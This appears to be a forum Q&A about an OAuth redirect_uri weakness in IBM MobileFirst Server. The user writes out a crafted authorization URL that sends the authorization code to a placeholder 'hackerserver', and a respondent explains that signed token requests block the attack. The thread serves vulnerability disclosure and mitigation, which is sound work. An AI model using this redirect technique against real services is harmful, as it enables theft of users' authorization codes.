I login into application via security check (UserAuthSecurityCheck).
I frame a URL for authorization end point and changed the redirect_uri to different server(hacker server).
http://mobilefirstserver:port/mfp/api/az/v1/authorization?response_type=code&client_id=CLIENT_ID&scope=UserAuthSecurityCheck&redirect_uri=http://hackerserver:port/context/getdata
When I make this request, it delivers the authorization code to hacker server. http://hackerserver:port/context/getdata?code=authorization_code
Now I can able to access this authorization_code in hacker server.
I believe hacker can take advantage of this and he makes you click a link in different browser tab and can able to execute the request to authorization end point.
Why no whitelisting done in the framework for "redirect_uri"?
How to mitigate this issue?
Open redirects must be avoided as per oAuth specification
https://www.rfc-editor.org/rfc/rfc6749#section-10.15
you are right that we are not whitelisting the
redirect_uri
, however, the MobileFirst Server is mitigating this vulnerability by forcing the token request (that uses the authorization code) to be signed - thus making the attack invalid.Disclaimer: I'm a developer in the IBM MobileFirst Foundation team.